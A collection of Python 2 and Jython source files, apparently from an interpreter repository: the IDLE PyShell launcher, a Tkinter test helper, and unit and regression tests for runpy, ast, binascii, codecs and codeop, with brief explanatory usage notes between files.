def readable(self):
return True
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
result = self._line_buffer
self._line_buffer = ''
if size < 0:
while True:
line = self.shell.readline()
if not line: break
result += line
else:
while len(result) < size:
line = self.shell.readline()
if not line: break
result += line
self._line_buffer = result[size:]
result = result[:size]
return result
def readline(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
line = self._line_buffer or self.shell.readline()
if size < 0:
size = len(line)
self._line_buffer = line[size:]
return line[:size]
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = True
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
enable_shell = False
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
                    # filename is actually a directory, so skip it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
# Check for problematic OS X Tk versions and print a warning message
# in the IDLE shell window; this is less intrusive than always opening
# a separate window.
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand(''.join(("print('", tkversionwarning, "')")))
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
```
#### File: test/test_ttk/support.py
```python
import Tkinter
def get_tk_root():
try:
root = Tkinter._default_root
except AttributeError:
# it is possible to disable default root in Tkinter, although
# I haven't seen people doing it (but apparently someone did it
# here).
root = None
if root is None:
# create a new master only if there isn't one already
root = Tkinter.Tk()
return root
def root_deiconify():
root = get_tk_root()
root.deiconify()
def root_withdraw():
root = get_tk_root()
root.withdraw()
def simulate_mouse_click(widget, x, y):
"""Generate proper events to click at the x, y position (tries to act
like an X server)."""
widget.event_generate('<Enter>', x=0, y=0)
widget.event_generate('<Motion>', x=x, y=y)
widget.event_generate('<ButtonPress-1>', x=x, y=y)
widget.event_generate('<ButtonRelease-1>', x=x, y=y)
```
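Of the helpers above, `simulate_mouse_click` is the only non-obvious one: it has to synthesize the full `<Enter>`/`<Motion>`/`<ButtonPress-1>`/`<ButtonRelease-1>` sequence a real X server would deliver. A minimal usage sketch follows, assuming `support.py` is importable and using a throwaway `Tkinter.Button` and callback of my own, not anything from the test suite:
```python
import Tkinter
from support import get_tk_root, simulate_mouse_click  # assumes support.py is on sys.path
clicks = []
root = get_tk_root()
button = Tkinter.Button(root, text="Press", command=lambda: clicks.append(1))
button.pack()
root.update()                       # realize the widget so it can receive events
simulate_mouse_click(button, 5, 5)  # synthesize Enter/Motion/Press/Release at (5, 5)
root.update()                       # let Tk dispatch the generated events
print clicks                        # expected to be [1] if the click was delivered
```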
#### File: 2.7/test/test_runpy.py
```python
import unittest
import os
import os.path
import sys
import re
import tempfile
from test.test_support import verbose, run_unittest, forget
from test.script_helper import (temp_dir, make_script, compile_script,
make_pkg, make_zip_script, make_zip_pkg)
from runpy import _run_code, _run_module_code, run_module, run_path
# Note: This module can't safely test _run_module_as_main as it
# runs its tests in the current process, which would mess with the
# real __main__ module (usually test.regrtest)
# See test_cmd_line_script for a test that executes that code path
# Set up the test code and expected results
class RunModuleCodeTest(unittest.TestCase):
"""Unit tests for runpy._run_code and runpy._run_module_code"""
expected_result = ["Top level assignment", "Lower level reference"]
test_source = (
"# Check basic code execution\n"
"result = ['Top level assignment']\n"
"def f():\n"
" result.append('Lower level reference')\n"
"f()\n"
"# Check the sys module\n"
"import sys\n"
"run_argv0 = sys.argv[0]\n"
"run_name_in_sys_modules = __name__ in sys.modules\n"
"if run_name_in_sys_modules:\n"
" module_in_sys_modules = globals() is sys.modules[__name__].__dict__\n"
"# Check nested operation\n"
"import runpy\n"
"nested = runpy._run_module_code('x=1\\n', mod_name='<run>')\n"
)
def test_run_code(self):
saved_argv0 = sys.argv[0]
d = _run_code(self.test_source, {})
self.assertEqual(d["result"], self.expected_result)
self.assertIs(d["__name__"], None)
self.assertIs(d["__file__"], None)
self.assertIs(d["__loader__"], None)
self.assertIs(d["__package__"], None)
self.assertIs(d["run_argv0"], saved_argv0)
self.assertNotIn("run_name", d)
self.assertIs(sys.argv[0], saved_argv0)
def test_run_module_code(self):
initial = object()
name = "<Nonsense>"
file = "Some other nonsense"
loader = "Now you're just being silly"
package = '' # Treat as a top level module
d1 = dict(initial=initial)
saved_argv0 = sys.argv[0]
d2 = _run_module_code(self.test_source,
d1,
name,
file,
loader,
package)
self.assertNotIn("result", d1)
self.assertIs(d2["initial"], initial)
self.assertEqual(d2["result"], self.expected_result)
self.assertEqual(d2["nested"]["x"], 1)
self.assertIs(d2["__name__"], name)
self.assertTrue(d2["run_name_in_sys_modules"])
self.assertTrue(d2["module_in_sys_modules"])
self.assertIs(d2["__file__"], file)
self.assertIs(d2["run_argv0"], file)
self.assertIs(d2["__loader__"], loader)
self.assertIs(d2["__package__"], package)
self.assertIs(sys.argv[0], saved_argv0)
self.assertNotIn(name, sys.modules)
class RunModuleTest(unittest.TestCase):
"""Unit tests for runpy.run_module"""
def expect_import_error(self, mod_name):
try:
run_module(mod_name)
except ImportError:
pass
else:
self.fail("Expected import error for " + mod_name)
def test_invalid_names(self):
# Builtin module
self.expect_import_error("sys")
# Non-existent modules
self.expect_import_error("sys.imp.eric")
self.expect_import_error("os.path.half")
self.expect_import_error("a.bee")
self.expect_import_error(".howard")
self.expect_import_error("..eaten")
# Package without __main__.py
self.expect_import_error("multiprocessing")
def test_library_module(self):
run_module("runpy")
def _add_pkg_dir(self, pkg_dir):
os.mkdir(pkg_dir)
pkg_fname = os.path.join(pkg_dir, "__init__"+os.extsep+"py")
pkg_file = open(pkg_fname, "w")
pkg_file.close()
return pkg_fname
def _make_pkg(self, source, depth, mod_base="runpy_test"):
pkg_name = "__runpy_pkg__"
test_fname = mod_base+os.extsep+"py"
pkg_dir = sub_dir = tempfile.mkdtemp()
if verbose: print " Package tree in:", sub_dir
sys.path.insert(0, pkg_dir)
if verbose: print " Updated sys.path:", sys.path[0]
for i in range(depth):
sub_dir = os.path.join(sub_dir, pkg_name)
pkg_fname = self._add_pkg_dir(sub_dir)
if verbose: print " Next level in:", sub_dir
if verbose: print " Created:", pkg_fname
mod_fname = os.path.join(sub_dir, test_fname)
mod_file = open(mod_fname, "w")
mod_file.write(source)
mod_file.close()
if verbose: print " Created:", mod_fname
mod_name = (pkg_name+".")*depth + mod_base
return pkg_dir, mod_fname, mod_name
def _del_pkg(self, top, depth, mod_name):
for entry in list(sys.modules):
if entry.startswith("__runpy_pkg__"):
del sys.modules[entry]
if verbose: print " Removed sys.modules entries"
del sys.path[0]
if verbose: print " Removed sys.path entry"
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
try:
os.remove(os.path.join(root, name))
except OSError, ex:
if verbose: print ex # Persist with cleaning up
for name in dirs:
fullname = os.path.join(root, name)
try:
os.rmdir(fullname)
except OSError, ex:
if verbose: print ex # Persist with cleaning up
try:
os.rmdir(top)
if verbose: print " Removed package tree"
except OSError, ex:
if verbose: print ex # Persist with cleaning up
def _check_module(self, depth):
pkg_dir, mod_fname, mod_name = (
self._make_pkg("x=1\n", depth))
forget(mod_name)
try:
if verbose: print "Running from source:", mod_name
d1 = run_module(mod_name) # Read from source
self.assertIn("x", d1)
self.assertTrue(d1["x"] == 1)
del d1 # Ensure __loader__ entry doesn't keep file open
__import__(mod_name)
os.remove(mod_fname)
if verbose: print "Running from compiled:", mod_name
d2 = run_module(mod_name) # Read from bytecode
self.assertIn("x", d2)
self.assertTrue(d2["x"] == 1)
del d2 # Ensure __loader__ entry doesn't keep file open
finally:
self._del_pkg(pkg_dir, depth, mod_name)
if verbose: print "Module executed successfully"
def _check_package(self, depth):
pkg_dir, mod_fname, mod_name = (
self._make_pkg("x=1\n", depth, "__main__"))
pkg_name, _, _ = mod_name.rpartition(".")
forget(mod_name)
try:
if verbose: print "Running from source:", pkg_name
d1 = run_module(pkg_name) # Read from source
self.assertIn("x", d1)
self.assertTrue(d1["x"] == 1)
del d1 # Ensure __loader__ entry doesn't keep file open
__import__(mod_name)
os.remove(mod_fname)
if verbose: print "Running from compiled:", pkg_name
d2 = run_module(pkg_name) # Read from bytecode
self.assertIn("x", d2)
self.assertTrue(d2["x"] == 1)
del d2 # Ensure __loader__ entry doesn't keep file open
finally:
self._del_pkg(pkg_dir, depth, pkg_name)
if verbose: print "Package executed successfully"
def _add_relative_modules(self, base_dir, source, depth):
if depth <= 1:
raise ValueError("Relative module test needs depth > 1")
pkg_name = "__runpy_pkg__"
module_dir = base_dir
for i in range(depth):
parent_dir = module_dir
module_dir = os.path.join(module_dir, pkg_name)
# Add sibling module
sibling_fname = os.path.join(module_dir, "sibling"+os.extsep+"py")
sibling_file = open(sibling_fname, "w")
sibling_file.close()
if verbose: print " Added sibling module:", sibling_fname
# Add nephew module
uncle_dir = os.path.join(parent_dir, "uncle")
self._add_pkg_dir(uncle_dir)
if verbose: print " Added uncle package:", uncle_dir
cousin_dir = os.path.join(uncle_dir, "cousin")
self._add_pkg_dir(cousin_dir)
if verbose: print " Added cousin package:", cousin_dir
nephew_fname = os.path.join(cousin_dir, "nephew"+os.extsep+"py")
nephew_file = open(nephew_fname, "w")
nephew_file.close()
if verbose: print " Added nephew module:", nephew_fname
def _check_relative_imports(self, depth, run_name=None):
contents = r"""\
from __future__ import absolute_import
from . import sibling
from ..uncle.cousin import nephew
"""
pkg_dir, mod_fname, mod_name = (
self._make_pkg(contents, depth))
try:
self._add_relative_modules(pkg_dir, contents, depth)
pkg_name = mod_name.rpartition('.')[0]
if verbose: print "Running from source:", mod_name
d1 = run_module(mod_name, run_name=run_name) # Read from source
self.assertIn("__package__", d1)
self.assertTrue(d1["__package__"] == pkg_name)
self.assertIn("sibling", d1)
self.assertIn("nephew", d1)
del d1 # Ensure __loader__ entry doesn't keep file open
__import__(mod_name)
os.remove(mod_fname)
if verbose: print "Running from compiled:", mod_name
d2 = run_module(mod_name, run_name=run_name) # Read from bytecode
self.assertIn("__package__", d2)
self.assertTrue(d2["__package__"] == pkg_name)
self.assertIn("sibling", d2)
self.assertIn("nephew", d2)
del d2 # Ensure __loader__ entry doesn't keep file open
finally:
self._del_pkg(pkg_dir, depth, mod_name)
if verbose: print "Module executed successfully"
def test_run_module(self):
for depth in range(4):
if verbose: print "Testing package depth:", depth
self._check_module(depth)
def test_run_package(self):
for depth in range(1, 4):
if verbose: print "Testing package depth:", depth
self._check_package(depth)
def test_explicit_relative_import(self):
for depth in range(2, 5):
if verbose: print "Testing relative imports at depth:", depth
self._check_relative_imports(depth)
def test_main_relative_import(self):
for depth in range(2, 5):
if verbose: print "Testing main relative imports at depth:", depth
self._check_relative_imports(depth, "__main__")
class RunPathTest(unittest.TestCase):
"""Unit tests for runpy.run_path"""
# Based on corresponding tests in test_cmd_line_script
test_source = """\
# Script may be run with optimisation enabled, so don't rely on assert
# statements being executed
def assertEqual(lhs, rhs):
if lhs != rhs:
raise AssertionError('%r != %r' % (lhs, rhs))
def assertIs(lhs, rhs):
if lhs is not rhs:
raise AssertionError('%r is not %r' % (lhs, rhs))
# Check basic code execution
result = ['Top level assignment']
def f():
result.append('Lower level reference')
f()
assertEqual(result, ['Top level assignment', 'Lower level reference'])
# Check the sys module
import sys
assertIs(globals(), sys.modules[__name__].__dict__)
argv0 = sys.argv[0]
"""
def _make_test_script(self, script_dir, script_basename, source=None):
if source is None:
source = self.test_source
return make_script(script_dir, script_basename, source)
def _check_script(self, script_name, expected_name, expected_file,
expected_argv0, expected_package):
result = run_path(script_name)
self.assertEqual(result["__name__"], expected_name)
self.assertEqual(result["__file__"], expected_file)
self.assertIn("argv0", result)
self.assertEqual(result["argv0"], expected_argv0)
self.assertEqual(result["__package__"], expected_package)
def _check_import_error(self, script_name, msg):
msg = re.escape(msg)
self.assertRaisesRegexp(ImportError, msg, run_path, script_name)
def test_basic_script(self):
with temp_dir() as script_dir:
mod_name = 'script'
script_name = self._make_test_script(script_dir, mod_name)
self._check_script(script_name, "<run_path>", script_name,
script_name, None)
def test_script_compiled(self):
with temp_dir() as script_dir:
mod_name = 'script'
script_name = self._make_test_script(script_dir, mod_name)
compiled_name = compile_script(script_name)
os.remove(script_name)
self._check_script(compiled_name, "<run_path>", compiled_name,
compiled_name, None)
def test_directory(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
self._check_script(script_dir, "<run_path>", script_name,
script_dir, '')
def test_directory_compiled(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
compiled_name = compile_script(script_name)
os.remove(script_name)
self._check_script(script_dir, "<run_path>", compiled_name,
script_dir, '')
def test_directory_error(self):
with temp_dir() as script_dir:
mod_name = 'not_main'
script_name = self._make_test_script(script_dir, mod_name)
msg = "can't find '__main__' module in %r" % script_dir
self._check_import_error(script_dir, msg)
def test_zipfile(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
zip_name, fname = make_zip_script(script_dir, 'test_zip', script_name)
self._check_script(zip_name, "<run_path>", fname, zip_name, '')
def test_zipfile_compiled(self):
with temp_dir() as script_dir:
mod_name = '__main__'
script_name = self._make_test_script(script_dir, mod_name)
compiled_name = compile_script(script_name)
zip_name, fname = make_zip_script(script_dir, 'test_zip', compiled_name)
self._check_script(zip_name, "<run_path>", fname, zip_name, '')
def test_zipfile_error(self):
with temp_dir() as script_dir:
mod_name = 'not_main'
script_name = self._make_test_script(script_dir, mod_name)
zip_name, fname = make_zip_script(script_dir, 'test_zip', script_name)
msg = "can't find '__main__' module in %r" % zip_name
self._check_import_error(zip_name, msg)
def test_main_recursion_error(self):
with temp_dir() as script_dir, temp_dir() as dummy_dir:
mod_name = '__main__'
source = ("import runpy\n"
"runpy.run_path(%r)\n") % dummy_dir
script_name = self._make_test_script(script_dir, mod_name, source)
zip_name, fname = make_zip_script(script_dir, 'test_zip', script_name)
msg = "recursion depth exceeded"
self.assertRaisesRegexp(RuntimeError, msg, run_path, zip_name)
def test_main():
run_unittest(RunModuleCodeTest, RunModuleTest, RunPathTest)
if __name__ == "__main__":
test_main()
```
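For orientation, the two runpy entry points these tests exercise behave roughly as sketched below; the stdlib module name is the same one `test_library_module` uses, and the commented-out path is a hypothetical placeholder rather than anything from the test:
```python
import runpy
# run_module locates a module by name on sys.path and executes its code in a
# fresh namespace, returning the resulting module globals as a plain dict.
globs = runpy.run_module("runpy")
print sorted(globs)[:5]
# run_path executes code located by filesystem path instead: a single script,
# or a directory/zipfile containing a __main__.py.
# globs = runpy.run_path("/path/to/script_or_dir")  # hypothetical path
```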
#### File: test/bugs/pr149.py
```python
import java
class Foo(java.io.Serializable):
def init(self):
pass
```
#### File: test/bugs/pr192.py
```python
def test1():
'Test function 1'
pass
def test2(a, b=2, c=3):
pass
attrs = dir(test1)[:]
for attr in ['__doc__', '__name__', 'func_code', 'func_defaults',
'func_doc', 'func_globals', 'func_name']:
attrs.remove(attr)
assert not attrs
assert test1.__doc__ == test1.func_doc == 'Test function 1'
assert test1.__name__ == test1.func_name == 'test1'
assert test1.func_code
assert test1.func_defaults is None
assert test1.func_globals == globals()
assert test2.func_defaults == (2, 3)
co = test2.func_code
attrs = dir(co)[:]
for attr in ['co_name', 'co_argcount', 'co_varnames', 'co_filename',
'co_firstlineno', 'co_flags']:
attrs.remove(attr)
##assert not attrs
flags = 0x4 | 0x8
assert co.co_name == 'test2'
assert co.co_argcount == 3
assert co.co_varnames == ('a', 'b', 'c')
assert co.co_filename
assert co.co_firstlineno
assert (co.co_flags & flags) == 0
def test3(a, *args, **kw):
pass
assert (test3.func_code.co_flags & flags) == flags
class Foo:
def method(self):
"""This is a method"""
pass
attrs = dir(Foo.method)[:]
for attr in ['im_self', 'im_func', 'im_class', '__doc__', '__name__']:
attrs.remove(attr)
assert not attrs
assert Foo.method.im_self is None
assert Foo.method.im_class == Foo
assert Foo.method.im_func
assert Foo.method.im_func.__name__ == Foo.method.__name__
assert Foo.method.im_func.__doc__ == Foo.method.__doc__
f = Foo()
m = f.method
assert m.im_self == f
assert m.im_class == Foo
assert m.im_func == Foo.method.im_func
assert m.__name__ == Foo.method.__name__
assert m.__doc__ == Foo.method.__doc__
class Baz:
pass
try:
m.im_class = Baz
assert 0
except TypeError:
pass
try:
m.im_stuff = 7
assert 0
except AttributeError:
pass
```
#### File: test/bugs/pr208.py
```python
def test(x):
return x
assert 7 == apply(test, (7,))
assert 7 == apply(test, (), {'x': 7})
try:
apply(test, (1,), 7)
print 'TypeError expected'
except TypeError:
pass
try:
apply(test, (1,), {7:3})
print 'TypeError expected'
except TypeError:
pass
try:
apply(test, (1,), None)
print 'TypeError expected'
except TypeError:
pass
```
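The pr208 test leans on the Python 2-only equivalence between `apply()` and the extended call syntax; a compact restatement with an illustrative function of my own rather than the test's:
```python
def add(x, y=0):
    return x + y
# apply(f, args, kwargs) is the older spelling of f(*args, **kwargs)
assert apply(add, (7,)) == add(*(7,)) == 7
assert apply(add, (), {'x': 3, 'y': 4}) == add(**{'x': 3, 'y': 4}) == 7
# A non-mapping third argument (or a mapping with non-string keys) raises
# TypeError, which is exactly what pr208.py checks.
```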
#### File: Lib/test/test_ast_jy.py
```python
import unittest
import ast
from test import test_support
def srcExprToTree(source, kind='exec'):
return compile(source, '<module>', kind, ast.PyCF_ONLY_AST)
class TestCompile(unittest.TestCase):
def test_compile_ast(self):
node = srcExprToTree("1/2")
compile(node, "<string>", 'exec')
def test_alias_trim(self):
node = srcExprToTree("import os. path")
self.assertEquals(node.body[0].names[0].name, "os.path")
node = srcExprToTree("import os .path")
self.assertEquals(node.body[0].names[0].name, "os.path")
node = srcExprToTree("import os . path")
self.assertEquals(node.body[0].names[0].name, "os.path")
def test_cmpop(self):
expr = srcExprToTree('a < b < c', 'eval')
compare = expr.body
self.assert_(isinstance(compare.ops[0], ast.Lt))
self.assert_(isinstance(compare.comparators[0], ast.Name))
self.assert_(isinstance(compare.ops[1], ast.Lt))
self.assert_(isinstance(compare.comparators[1], ast.Name))
self.assert_(isinstance(compare.ops[1:][0], ast.Lt))
self.assert_(isinstance(compare.comparators[1:][0], ast.Name))
z = zip( compare.ops[1:], compare.comparators[1:])
self.assert_(isinstance(z[0][0], ast.Lt))
self.assert_(isinstance(z[0][1], ast.Name))
def test_empty_init(self):
# Jython 2.5.0 did not allow empty constructors for many ast node types
# but CPython ast nodes do allow this. For the moment, I don't see a
# reason to allow construction of the super types (like ast.AST and
# ast.stmt) as well as the op types that are implemented as enums in
        # Jython (like boolop), but I've left them in, commented out, for
# now. We may need them in the future since CPython allows this, but
# it may fall under implementation detail.
#ast.AST()
ast.Add()
ast.And()
ast.Assert()
ast.Assign()
ast.Attribute()
ast.AugAssign()
ast.AugLoad()
ast.AugStore()
ast.BinOp()
ast.BitAnd()
ast.BitOr()
ast.BitXor()
ast.BoolOp()
ast.Break()
ast.Call()
ast.ClassDef()
ast.Compare()
ast.Continue()
ast.Del()
ast.Delete()
ast.Dict()
ast.Div()
ast.Ellipsis()
ast.Eq()
ast.Exec()
ast.Expr()
ast.Expression()
ast.ExtSlice()
ast.FloorDiv()
ast.For()
ast.FunctionDef()
ast.GeneratorExp()
ast.Global()
ast.Gt()
ast.GtE()
ast.If()
ast.IfExp()
ast.Import()
ast.ImportFrom()
ast.In()
ast.Index()
ast.Interactive()
ast.Invert()
ast.Is()
ast.IsNot()
ast.LShift()
ast.Lambda()
ast.List()
ast.ListComp()
ast.Load()
ast.Lt()
ast.LtE()
ast.Mod()
ast.Module()
ast.Mult()
ast.Name()
ast.Not()
ast.NotEq()
ast.NotIn()
ast.Num()
ast.Or()
ast.Param()
ast.Pass()
ast.Pow()
ast.Print()
ast.RShift()
ast.Raise()
ast.Repr()
ast.Return()
ast.Slice()
ast.Store()
ast.Str()
ast.Sub()
ast.Subscript()
ast.Suite()
ast.TryExcept()
ast.TryFinally()
ast.Tuple()
ast.UAdd()
ast.USub()
ast.UnaryOp()
ast.While()
ast.With()
ast.Yield()
ast.alias()
ast.arguments()
#ast.boolop()
#ast.cmpop()
ast.comprehension()
#ast.excepthandler()
#ast.expr()
#ast.expr_context()
ast.keyword()
#ast.mod()
#ast.operator()
#ast.slice()
#ast.stmt()
#ast.unaryop()
#==============================================================================
def test_main(verbose=None):
test_classes = [TestCompile]
test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main(verbose=True)
```
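`srcExprToTree` above is just `compile()` with the `ast.PyCF_ONLY_AST` flag; a minimal sketch of the round trip the tests rely on, using an illustrative source string:
```python
import ast
tree = compile("x = 1 + 2", "<module>", "exec", ast.PyCF_ONLY_AST)
assert isinstance(tree, ast.Module)
assert isinstance(tree.body[0], ast.Assign)
# The AST object can be handed back to compile() and executed like normal code.
ns = {}
exec compile(tree, "<string>", "exec") in ns
assert ns["x"] == 3
```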
#### File: Lib/test/test_binascii_jy.py
```python
from test import test_support
from test.test_binascii import BinASCIITest
import unittest
import binascii
class UnicodeBinASCIITest(BinASCIITest):
type2test = unicode
# Create binary test data, but only 7-bit data to survive implicit unicode to str conversion.
rawdata = "The quick brown fox jumps over the lazy dog.\r\n"
rawdata += "".join(map(chr, xrange(128)))
rawdata += "\r\nHello world.\n"
def test_base64invalid(self):
# Test base64 with random invalid characters sprinkled throughout.
# This is a copy of BinASCIITest.test_base64invalid with 256 changed to 128 where we
# generate "fillers".
# Creating the modified test reveals a latent bug in the test as written, which is that the
# padding character "=" is/was inserted as a filler. In the original test, the location of
        # that is harmless. With the change from 256 to 128, it causes early termination of the
# a2b_base64 conversion (both CPython and Jython). We therefore make padding a valid
# character, excluding it from the fillers.
MAX_BASE64 = 57
lines = []
for i in range(0, len(self.data), MAX_BASE64):
b = self.type2test(self.rawdata[i:i+MAX_BASE64])
a = binascii.b2a_base64(b)
lines.append(a)
fillers = ""
valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
valid += "=" # pad character also valid
for i in xrange(128): # not 256 as in BinASCIITest.test_base64invalid
c = chr(i)
if c not in valid:
fillers += c
def addnoise(line):
noise = fillers
ratio = len(line) // len(noise)
res = ""
while line and noise:
if len(line) // len(noise) > ratio:
c, line = line[0], line[1:]
else:
c, noise = noise[0], noise[1:]
res += c
return res + noise + line
res = ""
for line in map(addnoise, lines):
a = self.type2test(line)
b = binascii.a2b_base64(a)
res += b
self.assertEqual(res, self.rawdata)
# Test base64 with just invalid characters, which should return
# empty strings. TBD: shouldn't it raise an exception instead ?
self.assertEqual(binascii.a2b_base64(self.type2test(fillers)), '')
def test_main():
test_support.run_unittest(UnicodeBinASCIITest)
if __name__ == "__main__":
test_main()
```
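The unicode-specific subclass above builds on the plain `binascii` base64 helpers; as a reference point, the basic round trip looks like this (the payload string is illustrative):
```python
import binascii
encoded = binascii.b2a_base64("The quick brown fox")  # one line, ending in '\n'
decoded = binascii.a2b_base64(encoded)
assert decoded == "The quick brown fox"
# a2b_base64 silently skips characters outside the base64 alphabet, which is
# the behaviour the "addnoise" machinery in the test above depends on.
```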
#### File: Lib/test/test_codecs_jy.py
```python
import subprocess
import sys
import unittest
from test import test_support
class CodecsTestCase(unittest.TestCase):
def test_print_sans_lib(self):
# Encode and decode using utf-8 in an environment without the standard
# library, to check that a utf-8 codec is always available. See:
# http://bugs.jython.org/issue1458
subprocess.call([sys.executable, "-J-Dpython.cachedir.skip=true",
"-S", # No site module: avoid codec registry initialised too soon
test_support.findfile('print_sans_lib.py')])
def test_string_escape_1502(self):
# http://bugs.jython.org/issue1502
self.assertEqual('\\x00'.encode('string-escape'), '\\\\x00')
self.assertEqual('\\x00'.encode('unicode-escape'), '\\\\x00')
def test_main():
test_support.run_unittest(CodecsTestCase)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_codeop_jy.py
```python
import codeop
import unittest
from test import test_support
from test.test_support import run_unittest
def compile_(source,name="<input>",symbol="single"):
return compile(source,name,symbol)
class CompileTests(unittest.TestCase):
def assertValid(self, str, symbol='single',values=None,value=None):
'''succeed iff str is a valid piece of code'''
code = compile_(str, "<input>", symbol)
if values:
d = {}
exec code in d
del d['__builtins__']
self.assertEquals(d,values)
elif value is not None:
self.assertEquals(eval(code,self.eval_d),value)
else:
self.assert_(code)
def assertInvalid(self, str, symbol='single', is_syntax=1):
'''succeed iff str is the start of an invalid piece of code'''
try:
compile_(str,symbol=symbol)
self.fail("No exception thrown for invalid code")
except SyntaxError:
self.assert_(is_syntax)
except OverflowError:
self.assert_(not is_syntax)
def test_valid(self):
av = self.assertValid
# Failed for Jython 2.5a2. See http://bugs.jython.org/issue1116.
        # For some reason this test fails when run from test_codeops#test_valid
        # under Jython (it works in CPython).
av("@a.b.c\ndef f():\n pass")
        # These tests pass on Jython, but fail on CPython. We will need to investigate
# to decide if we need to match CPython.
av("\n\n")
av("# a\n")
av("\n\na = 1\n\n",values={'a':1})
av("\n\nif 1: a=1\n\n",values={'a':1})
av("def x():\n pass\n ")
av("def x():\n pass\n ")
av("#a\n\n \na=3\n",values={'a':3})
av("def f():\n pass\n#foo")
# these tests fail in Jython in test_codeop.py because PythonPartial.g
# erroneously allows them through. Once that is fixed, these tests
# can be deleted.
def test_invalid(self):
ai = self.assertInvalid
ai("del 1")
ai("del ()")
ai("del (1,)")
ai("del [1]")
ai("del '1'")
ai("[i for i in range(10)] = (1, 2, 3)")
def test_main():
run_unittest(CompileTests)
if __name__ == "__main__":
test_main()
```
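The `compile_` wrapper above defaults to the "single" symbol; for context, a short sketch of how the compile() symbol modes used by these tests differ (input strings are illustrative):
```python
ns = {}
exec compile("a = 1", "<input>", "single") in ns              # one interactive statement
assert ns["a"] == 1
assert eval(compile("40 + 2", "<input>", "eval")) == 42       # a single expression
exec compile("b = 2\nc = b * 3\n", "<input>", "exec") in ns   # a whole module body
assert ns["c"] == 6
```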
#### File: Lib/test/test_complex_jy.py
```python
import math
import operator
import os
import re
import unittest
from test import test_support
INF, NINF, NAN = map(float, ("inf", "-inf", "nan"))
class ComplexTest(unittest.TestCase):
def test_dunder_coerce(self):
self.assertEqual(complex.__coerce__(1+1j, None), NotImplemented)
